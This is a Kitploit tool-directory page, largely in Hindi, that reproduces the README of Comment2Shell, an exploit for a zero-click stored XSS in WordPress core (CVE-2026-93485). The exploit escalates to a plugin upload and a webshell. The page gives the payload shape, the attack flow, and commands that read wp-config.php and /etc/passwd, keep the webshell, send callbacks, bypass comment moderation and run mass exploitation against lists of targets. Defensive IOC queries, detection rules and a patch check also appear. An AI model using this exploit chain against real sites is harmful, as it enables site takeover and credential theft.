Skip to content
KitploitKITPLOIT
उपकरणएक्सप्लॉइटब्लॉग
Log in
जमा करें
उपकरणएक्सप्लॉइटब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
Comment2Shell — Zero-click प्री-ऑथ WordPress CVE-2026-93485 एक्सप्लॉइट चेन: wpautop() में स्टोर्ड XSS, जो admin-session प्लगइन अपलोड और एक self-deleting webshell तक बढ़ता है, साथ में scanner, shell, और Nuclei template। | Kitploit
उपकरण/GitHubGitHub/deathshotxd/comment2shell
भेद्यता स्कैनरशोषणवेब एप्लिकेशन शोषणपोस्ट-शोषणसुरक्षा वर्चुअलाइजेशनवेब सुरक्षापेनिट्रेशन टेस्टिंगरेड टीमिंगपेलोड डेवलपमेंटलैब और अभ्यास
GitHubdeathshotxd/comment2shell
1114घं 18मि पहलेअभी तक समीक्षित नहीं

Comment2Shell

Zero-click प्री-ऑथ WordPress CVE-2026-93485 एक्सप्लॉइट चेन: wpautop() में स्टोर्ड XSS, जो admin-session प्लगइन अपलोड और एक self-deleting webshell तक बढ़ता है, साथ में scanner, shell, और Nuclei template।

रिपॉजिटरी देखें

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

Comment2Shell

Comment2Shell, CVE-2026-93485 के लिए एक एंड-टू-एंड प्रूफ-ऑफ-कॉन्सेप्ट है, जो WordPress कोर wpautop() में एक प्री-ऑथेंटिकेशन स्टोर्ड XSS है जो एक एडमिनिस्ट्रेटर सेशन के अंदर रिमोट कोड एक्ज़ीक्यूशन तक बढ़ जाता है। एक अनाम कमेंट पेलोड को प्लांट करता है; जब कोई एडमिन पोस्ट खोलता है, तो ब्राउज़र एक वेबशेल प्लगइन अपलोड करता है, एक कमांड चलाता है, और शेल को फिर से डिलीट कर देता है। पूरी चेन एक डिपेंडेंसी-फ्री Python फ़ाइल है।

Comment2Shell logo

CVE-2026-93485, CVSS 7.1 HIGH, pre-auth, zero-click, fixed in 7.1.1

Animated terminal: the exploit chain end to end


Comment2Shell क्या है?

Comment2Shell, CVE-2026-93485 के लिए एक एक्सप्लॉइट और लोकल-लैब किट है। बग wp-includes/formatting.php में wpautop() पैराग्राफ फ़िल्टर में है जो कमेंट टेक्स्ट पर डिस्प्ले टाइम पर चलता है। एक blockquote cite एट्रिब्यूट के अंदर एक न्यूलाइन एक HTML कमेंट प्लेसहोल्डर बन जाती है; ब्लॉककोट्स को रैप करने वाला regex पहले पर रुक जाता है और एट्रिब्यूट के बीच में एक पैराग्राफ टैग इंजेक्ट कर देता है, जिसे ब्राउज़र फिर एक हैंडलर के रूप में पार्स करता है। एट्रिब्यूट इसे ज़ीरो-क्लिक पर फायर करता है।

>
onfocus
autofocus

टूल पूरी चेन को कवर करता है: एक पैसिव वर्ज़न स्कैन, एक बिनाइन XSS प्रोब, पूरा प्री-ऑथेंटिकेशन से RCE एक्सप्लॉइट, एक इंटरैक्टिव शेल, और एक डिफेंसिव IOC चेक।


एक्सप्लॉइट को किसी अकाउंट, नॉन्स, और एडमिन द्वारा पोस्ट देखने के अलावा किसी इंटरैक्शन की ज़रूरत नहीं है। कमेंट्स केवल खुले होने चाहिए।


Comment2Shell - CVE-2026-93485

यह क्यों मायने रखता है

WordPress वेब के एक बड़े हिस्से पर चलता है और wpautop() कोर कोड है, इसलिए वल्नरेबल फ़िल्टर हर प्रभावित इंस्टॉल पर थीम या प्लगइन की परवाह किए बिना शिप होता है। XSS स्टोर्ड, प्री-ऑथेंटिकेशन, और ज़ीरो-क्लिक है। चूंकि यह एडमिन सेशन में एक्ज़ीक्यूट होता है, यह एक डीफेसमेंट बग से बढ़कर है: एडमिन कुकी एक प्लगइन इंस्टॉल करने के लिए पर्याप्त है, और प्लगइन इंस्टॉल करना मनमाना कोड एक्ज़ीक्यूशन है।

फिक्स WordPress 7.1.1 में 25 ब्रांचों में बैकपोर्ट्स के साथ शिप हुआ, 4.7.36 तक। 4.7.0 से 7.1.0 तक हर रिलीज़ प्रभावित है।

डेमो


Comment2Shell demonstration


WordPress 7.1.0 के विरुद्ध नियंत्रित-लैब रन: एक अनाम कमेंट पेलोड को प्लांट करता है, पोस्ट खोलने वाला एडमिन ज़ीरो-क्लिक चेन को फायर करता है, वेबशेल अपलोड होता है, कमांड आउटपुट वापस आता है, और शेल खुद को डिलीट कर देता है। ब्राउज़र टैब टाइटल परिणाम बताता है, या तो Comment2Shell: shell uploaded या Comment2Shell: admin login required। सटीक प्रक्रिया के लिए docker/README.md देखें।

रिसर्च योगदान

Comment2Shell इस फ्लॉ के डिस्कवरी का दावा नहीं करता। इसकी रिपोर्ट Rafie Muhammad (Awesome Motive) ने HackerOne WordPress प्रोग्राम के माध्यम से की थी और इसे 7.1.1 में फिक्स किया गया। यहाँ योगदान पूरी चेन का एक रिप्रोड्यूसिबल, डिपेंडेंसी-फ्री इम्प्लीमेंटेशन है:

  • डिस्प्ले-टाइम फ़िल्टर कंडीशन्स जो पेलोड को KSES से बचने देती हैं
  • एक इन-ब्राउज़र ZIP बिल्डर ताकि प्लगइन अपलोड को किसी बाहरी फ़ाइल की ज़रूरत न हो
  • ऑटोमैटिक क्लीनअप, जहाँ वेबशेल कमांड के बाद खुद को अनलिंक कर लेता है
  • ब्लू-टीम आर्टिफैक्ट्स: एक nuclei टेम्पलेट, एक IOC स्क्रिप्ट, और लॉग क्वेरीज़

अटैक फ़्लो

Anonymous comment, wpautop bug, zero-click XSS, admin view, remote code execution


root@kitploit:~
1. Anonymous comment submission (no auth, no nonce)
   POST /wp-comments-post.php
   <blockquote cite="a\nb"><code>x" onfocus=... autofocus>
   KSES allows blockquote[cite] and code; the newline in cite survives.

2. Display-time filter chain (the bug)
   wpautop() at formatting.php:563:
     preg_replace('|<p><blockquote([^>]*)>|', '<blockquote$1><p>')
   [^>]* stops at the > inside the <!-- wpnl --> comment,
   so a <p> gets injected inside the cite attribute.

3. wptexturize() seals the attribute (block themes)
   Outer " becomes &#8221; (curly quote).
   The " inside <code> stays straight (no-texturize list).
   The browser then parses onfocus/autofocus as real attributes.

4. Zero-click XSS in the admin session
   autofocus fires onfocus on page load, no click needed.
   JS runs with the admin cookies.

5. Admin session -> plugin upload -> RCE
   GET /wp-admin/plugin-install.php, extract the nonce.
   Build ZIP in memory, POST update.php?action=upload-plugin.
   Webshell lands at wp-content/plugins/<rand>/<rand>.php.
   GET /wp-content/plugins/<rand>/<rand>.php?c=id

आवश्यकताएँ

  • एक प्रकाशित पोस्ट पर कमेंट्स खुले (डिफ़ॉल्ट)
  • अनाम कमेंटिंग की अनुमति (डिफ़ॉल्ट, comment_registration=0)
  • एक ब्लॉक थीम सक्रिय (Twenty Twenty-Two के बाद से डिफ़ॉल्ट)
  • एक एडमिन जो लॉग इन रहते हुए पोस्ट देखता है
  • Python 3.8+ (केवल स्टैंडर्ड लाइब्रेरी)

इंस्टॉलेशन

root@kitploit:~
git clone https://github.com/DeathShotXD/Comment2Shell.git
cd Comment2Shell
python3 comment2shell.py --help

कोई डिपेंडेंसी नहीं। केवल Python 3.8+ स्टैंडर्ड लाइब्रेरी, कोई pip install नहीं।

उपयोग

पैसिव वर्ज़न स्कैन

root@kitploit:~
# Single target
python3 comment2shell.py --scan -t https://target.com

# Batch scan
python3 comment2shell.py --scan -f targets.txt --threads 20

# From a pipeline
subfinder -d targets.txt | httpx -title | \
  grep -i wordpress | python3 comment2shell.py --scan --stdin

# JSON output
python3 comment2shell.py --scan -t https://target.com --json -o results.json

एक्टिव XSS प्रोब

root@kitploit:~
# Submit the benign detection payload (sets document.title)
python3 comment2shell.py --probe -t https://target.com

# With an OAST callback
python3 comment2shell.py --probe -t https://target.com \
  --callback https://your-id.oast.example

कमांड एक्ज़ीक्यूशन तक पूरी एक्सप्लॉइट चेन

एक्सप्लॉइट पेलोड पेज लोड पर alert("Comment2Shell XSS - CVE-2026-93485") फायर करता है (autofocus के माध्यम से ज़ीरो-क्लिक)। एडमिन के रूप में लॉग इन रहते हुए पोस्ट देखें। टैब टाइटल फिर सफलता पर Comment2Shell: shell uploaded पढ़ता है, या यदि ब्राउज़र में कोई एडमिन सेशन नहीं है तो Comment2Shell: admin login required।

root@kitploit:~
# Run a command, then delete the shell
python3 comment2shell.py -t https://target.com -c "id"

# Read wp-config.php
python3 comment2shell.py -t https://target.com -c "cat wp-config.php"

# Wait longer for the admin to view the post (default 45s)
python3 comment2shell.py -t https://target.com -c "id" --wait 60

# Keep the webshell after execution
python3 comment2shell.py -t https://target.com -c "id" --no-cleanup

# With an OAST callback
python3 comment2shell.py -t https://target.com \
  -c "cat /etc/passwd" \
  --callback https://your-id.oast.example

# Known-commenter approval bypass
python3 comment2shell.py -t https://target.com \
  -c "whoami" --known-commenter

# Through a proxy
python3 comment2shell.py -t https://target.com \
  -c "id" --proxy http://127.0.0.1:8080

टूल XSS कमेंट सबमिट करता है, जनरेट किए गए वेबशेल पाथ को हर 3s पर पोल करता है (--wait सेकंड तक), एडमिन के ब्राउज़र द्वारा अपलोड ट्रिगर होने पर कमांड चलाता है, फिर शेल को खुद डिलीट कर देता है (?d=1 PHP फ़ाइल को अनलिंक करता है और प्लगइन डायरेक्टरी को हटा देता है) ताकि कोई पर्सिस्टेंस पीछे न छूटे। इसे रखने के लिए --no-cleanup पास करें, या केवल पेलोड सबमिट करने के लिए --wait 0।

इंटरैक्टिव शेल

root@kitploit:~
# With a known shell path
python3 comment2shell.py --shell -t https://target.com \
  --shell-path ab12cd/ab12cd.php

# Run a single command on an existing shell
python3 comment2shell.py --exec -t https://target.com \
  --shell-path ab12cd/ab12cd.php -c "cat wp-config.php"

IOC चेक

root@kitploit:~
python3 comment2shell.py --ioc -t https://target.com

कमेंट अप्रूवल बायपास

पहली बार कमेंट करने वालों के नए कमेंट्स आमतौर पर मॉडरेशन के लिए रोके जाते हैं। टूल के पास इसके चारों ओर तीन रास्ते हैं:

रूटतरीकाफ़्लैग
Known commenterडिफ़ॉल्ट "A WordPress Commenter" <[email protected]> का पुनः उपयोग करता है, जिसे check_comment() ऑटो-अप्रूव करता है--known-commenter
Moderation offयदि comment_previously_approved=0, तो कोई भी आइडेंटिटी ऑटो-अप्रूव हो जाती हैdefault
Author previewएक पूर्व कमेंटर ?unapproved=<id>&moderation-hash=<hash> कुकी के माध्यम से पेंडिंग कमेंट्स देखता हैautomatic

Patchstack के अनुसार: "moderation isn't a security control."

Docker लैब

लोकल टेस्टिंग के लिए एक वल्नरेबल WordPress 7.1.0 स्पिन अप करें:

root@kitploit:~
cd docker
docker compose up -d
bash setup.sh
# Target: http://localhost:80  (host networking)
# Admin:  admin / Password123!
# Then:   python3 comment2shell.py -t http://localhost -c "id"

प्रत्येक रन एक नया पेलोड कमेंट सबमिट करता है। पेज पर केवल पहला autofocus पेलोड चलता है, इसलिए टूल लाइव पेलोड का पता लगाता है और उसके पाथ को पोल करता है; रनों के बीच पुराने कमेंट्स साफ़ करने के लिए bash clean.sh चलाएँ।

डिटेक्शन

सर्वर-साइड IoC

root@kitploit:~
# Suspicious comment submissions (newline in blockquote cite)
grep -rE 'blockquote.*cite=.*\n' /var/www/html/wp-content/ 2>/dev/null

# wp_comments table
mysql -e "SELECT comment_ID, comment_author, LEFT(comment_content,200) \
  FROM wp_comments WHERE comment_content LIKE '%blockquote%cite%\
  onfocus%' ORDER BY comment_date DESC;"

# Recently uploaded single-file plugins
find /var/www/html/wp-content/plugins/ -maxdepth 2 -name "*.php" \
  -newer /var/www/html/wp-config.php -not -path "*/akismet/*" \
  -not -path "*/hello*"

नेटवर्क IoC

root@kitploit:~
# Unusual POST to wp-comments-post.php with blockquote + onfocus
http.request.uri == "/wp-comments-post.php" AND
http.request.body contains "blockquote" AND
http.request.body contains "onfocus" AND
http.request.body contains "autofocus"

# Single-file plugin uploads from non-admin IPs
http.request.uri == "/wp-admin/update.php" AND
http.request.body contains "pluginzip"

Nuclei टेम्पलेट

root@kitploit:~
nuclei -t nuclei/CVE-2026-93485.yaml -u https://target.com

पैच वेरिफिकेशन

root@kitploit:~
# Vulnerable (before 7.1.1):
grep -n 'blockquote(\[^>\]\*)' wp-includes/formatting.php
# Should show: |<p><blockquote([^>]*)>|

# Patched (7.1.1+):
grep -n 'blockquote((?:\[^>"'\'')' wp-includes/formatting.php
# Should show: !<p><blockquote((?:[^>"']|"[^"]*"|'[^']*')*)>

पाइपलाइन उदाहरण

root@kitploit:~
# Find WordPress targets -> scan for CVE-2026-93485
subfinder -d program-scope.com -silent | \
  httpx -silent -title | \
  grep -i "wordpress" | \
  python3 comment2shell.py --scan --stdin --threads 20

# Mass exploit with OAST (authorized testing only)
cat vulnerable_targets.txt | \
  python3 comment2shell.py -t - -c "id" \
    --callback https://your-id.oast.example

# Save results as JSON
python3 comment2shell.py --scan -f all_targets.txt \
  --threads 30 -o scan_results.json --json

तकनीकी विवरण

मूल कारण

wp-includes/formatting.php:563 (वल्नरेबल, 7.1.1 से पहले):

root@kitploit:~
// VULNERABLE: [^>]* stops at > inside HTML comment placeholder
$text = preg_replace( '|<p><blockquote([^>]*)>|i', '<blockquote$1><p>', $text );

// PATCHED (7.1.1): quote-aware subpattern
$text = preg_replace( '!<p><blockquote((?:[^>"\']|"[^"]*"|\'[^\']*\')*)>!i', '<blockquote$1><p>', $text );

KSES इसे क्यों नहीं पकड़ता

सेव टाइम पर पेलोड बिनाइन HTML है। blockquote[cite] और code कमेंट अलाउलिस्ट में हैं (wp-includes/kses.php:605-633)। न्यूलाइन wp_kses_hair() के सिंटैक्स-चार मैप में नहीं है। एक्सप्लॉइट डिस्प्ले टाइम पर होता है, जब comment_text फ़िल्टर स्टोर्ड HTML को ट्रांसफ़ॉर्म करते हैं।

comment_text फ़िल्टर चेन

root@kitploit:~
add_filter( 'comment_text', 'wptexturize' );       // seals the attribute
add_filter( 'comment_text', 'convert_chars' );
add_filter( 'comment_text', 'make_clickable', 9 );
add_filter( 'comment_text', 'force_balance_tags', 25 );
add_filter( 'comment_text', 'convert_smilies', 20 );
add_filter( 'comment_text', 'wpautop', 30 );        // THE BUG

प्रभावित वर्ज़न

फिक्स 7.1.1 में 25 ब्रांचों में शिप हुआ। 4.7.0 से 7.1.0 तक हर रिलीज़ प्रभावित है।

ब्रांचवल्नरेबल <=फिक्स्ड
7.17.1.07.1.1
7.07.0.47.0.5
6.96.9.76.9.8
6.86.8.86.8.9
6.76.7.76.7.8
6.66.6.76.6.8
6.56.5.106.5.11
6.46.4.106.4.11
6.36.3.106.3.11
6.26.2.116.2.12
6.16.1.126.1.13
6.06.0.146.0.15
5.95.9.165.9.17
5.85.8.155.8.16
5.75.7.175.7.18
5.65.6.195.6.20
5.55.5.205.5.21
5.45.4.215.4.22
5.35.3.235.3.24
5.25.2.265.2.27
5.15.1.245.1.25
5.05.0.275.0.28
4.94.9.314.9.32
4.84.8.304.8.31
4.74.7.354.7.36

रिपॉज़िटरी संरचना

root@kitploit:~
Comment2Shell/
|-- comment2shell.py      scan, probe, exploit, shell, IOC check
|-- README.md
|-- PLAN.md               weekly maintenance plan
|-- BROWSER_VALIDATION.md manual browser validation steps
|-- docker/               vulnerable WordPress 7.1.0 lab
|   |-- docker-compose.yml
|   |-- setup.sh
|   |-- clean.sh
|   +-- README.md
|-- nuclei/               detection template
|-- ioc/                  server-side IOC checker
|-- requests/             raw HTTP exploit templates
|-- assets/               banner, logo, demo, animated SVGs
|-- browser_validate.html
|-- xss_validate.html
|-- validate.sh
+-- LICENSE

सीमाएँ

  • XSS पाथ एक ब्लॉक थीम पर निर्भर करता है (wptexturize एट्रिब्यूट को सील करता है); क्लासिक थीम इसे ट्रिगर नहीं कर सकतीं।
  • पेलोड एडमिन को दिखना चाहिए, इसलिए ऑटो-अप्रूवल या पहले से अप्रूव्ड कमेंटर आइडेंटिटी की ज़रूरत है।
  • RCE स्टेप के लिए एक एडमिन का वास्तव में लॉग इन रहते हुए पोस्ट देखना आवश्यक है; उसके बिना, केवल स्टोर्ड XSS प्रदर्शित होता है।
  • पेज पर केवल पहला autofocus पेलोड चलता है। टूल लाइव पेलोड का पता लगाता है, लेकिन पुराने पेलोड कमेंट्स को docker/clean.sh से साफ़ किया जाना चाहिए।
  • बंडल किया गया लैब WordPress 7.1.0 है। अन्य ब्रांचें वल्नरेबल regex साझा करती हैं लेकिन सभी का परीक्षण नहीं किया गया।

संदर्भ

  • CVE-2026-93485 - https://www.cve.org/CVERecord?id=CVE-2026-93485
  • GitHub advisory GHSA-qg7r-fjh2-wvx8 - https://github.com/WordPress/wordpress-develop/security/advisories/GHSA-qg7r-fjh2-wvx8
  • WordPress 7.1.1 release - https://wordpress.org/news/2026/09/wordpress-7-1-1-maintenance-and-security-release/
  • Researcher writeup - https://idnsec.com/research/comment2shell-zero-click-pre-auth-xss-to-rce-in-wordpress-core/
  • Patchstack analysis - https://patchstack.com/articles/wordpress-7-1-1-maintenance-and-security-release/
  • NVD - https://nvd.nist.gov/vuln/detail/CVE-2026-93485

टाइमलाइन

  • 2026-09-08 - HackerOne WordPress प्रोग्राम के माध्यम से रिपोर्ट किया गया
  • 2026-09-15 - Patchstack से CVE का अनुरोध किया गया
  • 2026-09-17 - WordPress 7.1.1 में फिक्स किया गया
  • 2026-09-18 - CVE-2026-93485 असाइन किया गया (CVSS 7.1)
  • 2026-09-21 - रिसर्चर राइटअप प्रकाशित
  • 2026-09-22 - THN, Orca, और SiteGuarding द्वारा कवरेज
  • 2026-09-23 - यह टूल रिलीज़ किया गया

ज़िम्मेदार उपयोग

यह प्रोजेक्ट अधिकृत सुरक्षा परीक्षण और शिक्षा के लिए मौजूद है। इसका उपयोग केवल उन सिस्टम्स के विरुद्ध करें जिनके आप मालिक हैं या जिनका परीक्षण करने के लिए आपके पास स्पष्ट लिखित अनुमति है। अधिकांश क्षेत्राधिकारों में कंप्यूटर सिस्टम्स तक अनधिकृत पहुँच अवैध है। लेखक दुरुपयोग या क्षति के लिए ज़िम्मेदार नहीं हैं। LICENSE देखें।

लेखक

0xDeathShotX_X - github.com/DeathShotXD | @SyedWaj25802383

टूल डाउनलोड करें